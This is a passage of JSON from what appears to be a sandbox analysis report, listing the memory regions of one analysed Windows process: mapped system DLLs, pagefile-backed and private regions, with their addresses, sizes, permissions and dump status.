159744, "start_va": 1967915008, "type": "region", "version": 1 }, "end_va": 1968074751, "entry_point": 1967937721, "filename": "\\Windows\\System32\\cfgmgr32.dll", "id": "region_1517", "name": "cfgmgr32.dll", "norm_filename": "c:\\windows\\system32\\cfgmgr32.dll", "region_type": "memory_mapped_file", "start_va": 1967915008, "timestamp": "00:01:14.409", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1970077696, "type": "region", "version": 1 }, "end_va": 1970151423, "entry_point": 1970082881, "filename": "\\Windows\\System32\\devobj.dll", "id": "region_1518", "name": "devobj.dll", "norm_filename": "c:\\windows\\system32\\devobj.dll", "region_type": "memory_mapped_file", "start_va": 1970077696, "timestamp": "00:01:14.409", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1970208768, "type": "region", "version": 1 }, "end_va": 1970311167, "entry_point": 1970227573, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1519", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1970208768, "timestamp": "00:01:14.410", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1970999295, "entry_point": 1970545715, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1520", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:01:14.410", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1971978240, "type": "region", "version": 1 }, "end_va": 1984864255, "entry_point": 1972508161, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_1521", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1971978240, "timestamp": "00:01:14.413", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1984888832, "type": "region", "version": 1 }, "end_va": 1985544191, "entry_point": 1984973285, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1522", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1984888832, "timestamp": "00:01:14.414", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1985544192, "type": "region", "version": 1 }, "end_va": 1986412543, "entry_point": 1985854948, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1523", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985544192, "timestamp": "00:01:14.414", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1988280319, "entry_point": 1987617906, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1524", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:14.414", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1988296704, "type": "region", "version": 1 }, "end_va": 1988337663, "entry_point": 1988301676, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1525", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1988296704, "timestamp": "00:01:14.415", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1988362240, "type": "region", "version": 1 }, "end_va": 1988681727, "entry_point": 1988402185, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1526", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1988362240, "timestamp": "00:01:14.415", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1988689920, "type": "region", "version": 1 }, "end_va": 1989513215, "entry_point": 1988810513, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1527", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1988689920, "timestamp": "00:01:14.415", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1691648, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1991495679, "entry_point": 1989810151, "filename": "\\Windows\\System32\\setupapi.dll", "id": "region_1528", "name": "setupapi.dll", "norm_filename": "c:\\windows\\system32\\setupapi.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:14.416", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1991507968, "type": "region", "version": 1 }, "end_va": 1991864319, "entry_point": 1991613350, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_1529", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1991507968, "timestamp": "00:01:14.416", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1991901184, "type": "region", "version": 1 }, "end_va": 1992486911, "entry_point": 1991917489, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_1530", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1991901184, "timestamp": "00:01:14.417", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1994784768, "type": "region", "version": 1 }, "end_va": 1995427839, "entry_point": 1994997719, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1531", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1994784768, "timestamp": "00:01:14.417", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1997799424, "type": "region", "version": 1 }, "end_va": 1999224831, "entry_point": 1998109245, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_1532", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1997799424, "timestamp": "00:01:14.418", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_1533", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:01:14.418", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 3211264, "type": "region", "version": 1 }, "end_va": 4030463, "entry_point": 0, "filename": null, "id": "region_1534", "name": "pagefile_0x0000000000310000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3211264, "timestamp": "00:01:14.423", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1971060736, "type": "region", "version": 1 }, "end_va": 1971896319, "entry_point": 1971066507, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1535", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1971060736, "timestamp": "00:01:14.423", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 2000683008, "type": "region", "version": 1 }, "end_va": 2000809983, "entry_point": 2000687957, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1536", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 2000683008, "timestamp": "00:01:14.424", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001537-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_264", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1537", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:14.440", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001538-addr_0x00000000000b0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_265", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 724991, "entry_point": 0, "filename": null, "id": "region_1538", "name": "private_0x00000000000b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 720896, "timestamp": "00:01:14.441", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 815103, "entry_point": 0, "filename": null, "id": "region_1539", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:01:14.441", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 1908735, "entry_point": 0, "filename": null, "id": "region_1540", "name": "pagefile_0x00000000001d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1900544, "timestamp": "00:01:14.441", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001541-addr_0x00000000001e0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_266", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 2031615, "entry_point": 0, "filename": null, "id": "region_1541", "name": "private_0x00000000001e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1966080, "timestamp": "00:01:14.441", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 5046272, "type": "region", "version": 1 }, "end_va": 6098943, "entry_point": 0, "filename": null, "id": "region_1542", "name": "pagefile_0x00000000004d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5046272, "timestamp": "00:01:14.441", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 6160384, "type": "region", "version": 1 }, "end_va": 10301439, "entry_point": 0, "filename": null, "id": "region_1543", "name": "pagefile_0x00000000005e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6160384, "timestamp": "00:01:14.441", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 12976128, "type": "region", "version": 1 }, "end_va": 25559039, "entry_point": 0, "filename": null, "id": "region_1544", "name": "pagefile_0x0000000000c60000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 12976128, "timestamp": "00:01:14.441", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2035711, "entry_point": 0, "filename": null, "id": "region_1545", "name": "pagefile_0x00000000001f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2031616, "timestamp": "00:01:14.442", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 25559040, "type": "region", "version": 1 }, "end_va": 28504063, "entry_point": 25559040, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1546", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 25559040, "timestamp": "00:01:14.443", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2105343, "entry_point": 0, "filename": null, "id": "region_1547", "name": "pagefile_0x0000000000200000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2097152, "timestamp": "00:01:14.445", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1948975104, "type": "region", "version": 1 }, "end_va": 1950670847, "entry_point": 1949165237, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_1548", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1948975104, "timestamp": "00:01:14.446", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4067327, "entry_point": 4063232, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_1549", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 4063232, "timestamp": "00:01:14.447", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 4136959, "entry_point": 0, "filename": null, "id": "region_1550", "name": "pagefile_0x00000000003f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4128768, "timestamp": "00:01:14.448", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001551-addr_0x0000000000b00000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_267", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 11534336, "type": "region", "version": 1 }, "end_va": 12582911, "entry_point": 0, "filename": null, "id": "region_1551", "name": "private_0x0000000000b00000", "norm_filename": null, "region_type": "private_memory", "start_va": 11534336, "timestamp": "00:01:14.453", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001552-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_268", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_1552", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:01:14.453", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4067327, "entry_point": 0, "filename": null, "id": "region_1553", "name": "pagefile_0x00000000003e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4063232, "timestamp": "00:01:14.454", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 376832, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4571135, "entry_point": 4339129, "filename": "\\Windows\\System32\\rpcss.dll", "id": "region_1554", "name": "rpcss.dll", "norm_filename": "c:\\windows\\system32\\rpcss.dll", "region_type": "memory_mapped_file", "start_va": 4194304, "timestamp": "00:01:14.460", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1966342144, "type": "region", "version": 1 }, "end_va": 1966391295, "entry_point": 1966346465, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_1556", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1966342144, "timestamp": "00:01:14.464", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 1939668992, "type": "region", "version": 1 }, "end_va": 1939931135, "entry_point": 1939710685, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_1557", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1939668992, "timestamp": "00:01:14.465", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001558-addr_0x0000000000400000-size_0x00000000000b0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_269", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 720896, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4915199, "entry_point": 0, "filename": null, "id": "region_1558", "name": "private_0x0000000000400000", "norm_filename": null, "region_type": "private_memory", "start_va": 4194304, "timestamp": "00:01:14.474", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 10354688, "type": "region", "version": 1 }, "end_va": 11268095, "entry_point": 0, "filename": null, "id": "region_1559", "name": "pagefile_0x00000000009e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10354688, "timestamp": "00:01:14.478", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001560-addr_0x0000000001b80000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_270", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 28835840, "type": "region", "version": 1 }, "end_va": 29884415, "entry_point": 0, "filename": null, "id": "region_1560", "name": "private_0x0000000001b80000", "norm_filename": null, "region_type": "private_memory", "start_va": 28835840, "timestamp": "00:01:14.479", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001561-addr_0x000000007ffdd000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_271", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147340288, "type": "region", "version": 1 }, "end_va": 2147344383, "entry_point": 0, "filename": null, "id": "region_1561", "name": "private_0x000000007ffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147340288, "timestamp": "00:01:14.479", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001562-addr_0x0000000000400000-size_0x0000000000024000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_272", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 147456, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4341759, "entry_point": 0, "filename": null, "id": "region_1562", "name": "private_0x0000000000400000", "norm_filename": null, "region_type": "private_memory", "start_va": 4194304, "timestamp": "00:01:14.486", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001563-addr_0x0000000000470000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_273", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 4653056, "type": "region", "version": 1 }, "end_va": 4915199, "entry_point": 0, "filename": null, "id": "region_1563", "name": "private_0x0000000000470000", "norm_filename": null, "region_type": "private_memory", "start_va": 4653056, "timestamp": "00:01:14.487", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1028096, "start_va": 1935540224, "type": "region", "version": 1 }, "end_va": 1936568319, "entry_point": 1935611873, "filename": "\\Windows\\System32\\WindowsCodecs.dll", "id": "region_1564", "name": "windowscodecs.dll", "norm_filename": "c:\\windows\\system32\\windowscodecs.dll", "region_type": "memory_mapped_file", "start_va": 1935540224, "timestamp": "00:01:14.487", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001565-addr_0x0000000000430000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_274", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 4390912, "type": "region", "version": 1 }, "end_va": 4395007, "entry_point": 0, "filename": null, "id": "region_1565", "name": "private_0x0000000000430000", "norm_filename": null, "region_type": "private_memory", "start_va": 4390912, "timestamp": "00:01:14.490", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001566-addr_0x0000000000440000-size_0x0000000000009000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_275", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 36864, "start_va": 4456448, "type": "region", "version": 1 }, "end_va": 4493311, "entry_point": 0, "filename": null, "id": "region_1566", "name": "private_0x0000000000440000", "norm_filename": null, "region_type": "private_memory", "start_va": 4456448, "timestamp": "00:01:14.490", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001567-addr_0x0000000000450000-size_0x0000000000009000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_276", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 36864, "start_va": 4521984, "type": "region", "version": 1 }, "end_va": 4558847, "entry_point": 0, "filename": null, "id": "region_1567", "name": "private_0x0000000000450000", "norm_filename": null, "region_type": "private_memory", "start_va": 4521984, "timestamp": "00:01:14.491", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001568-addr_0x0000000000ac0000-size_0x0000000000024000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_277", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 147456, "start_va": 11272192, "type": "region", "version": 1 }, "end_va": 11419647, "entry_point": 0, "filename": null, "id": "region_1568", "name": "private_0x0000000000ac0000", "norm_filename": null, "region_type": "private_memory", "start_va": 11272192, "timestamp": "00:01:14.491", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001569-addr_0x0000000001c80000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_278", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 29884416, "type": "region", "version": 1 }, "end_va": 30932991, "entry_point": 0, "filename": null, "id": "region_1569", "name": "private_0x0000000001c80000", "norm_filename": null, "region_type": "private_memory", "start_va": 29884416, "timestamp": "00:01:14.491", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 1901133824, "type": "region", "version": 1 }, "end_va": 1901445119, "entry_point": 1901145108, "filename": "\\Windows\\System32\\apphelp.dll", "id": "region_1570", "name": "apphelp.dll", "norm_filename": "c:\\windows\\system32\\apphelp.dll", "region_type": "memory_mapped_file", "start_va": 1901133824, "timestamp": "00:01:14.491", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20275200, "start_va": 1649016832, "type": "region", "version": 1 }, "end_va": 1669292031, "entry_point": 1649016832, "filename": "\\Windows\\System32\\imageres.dll", "id": "region_1571", "name": "imageres.dll", "norm_filename": "c:\\windows\\system32\\imageres.dll", "region_type": "memory_mapped_file", "start_va": 1649016832, "timestamp": "00:01:14.496", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001572-addr_0x0000000001b30000-size_0x0000000000048000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_279", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 294912, "start_va": 28508160, "type": "region", "version": 1 }, "end_va": 28803071, "entry_point": 0, "filename": null, "id": "region_1572", "name": "private_0x0000000001b30000", "norm_filename": null, "region_type": "private_memory", "start_va": 28508160, "timestamp": "00:01:14.500", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20275200, "start_va": 1628700672, "type": "region", "version": 1 }, "end_va": 1648975871, "entry_point": 1628700672, "filename": "\\Windows\\System32\\imageres.dll", "id": "region_1573", "name": "imageres.dll", "norm_filename": "c:\\windows\\system32\\imageres.dll", "region_type": "memory_mapped_file", "start_va": 1628700672, "timestamp": "00:01:14.500", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001576-addr_0x0000000000400000-size_0x0000000000012000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_280", 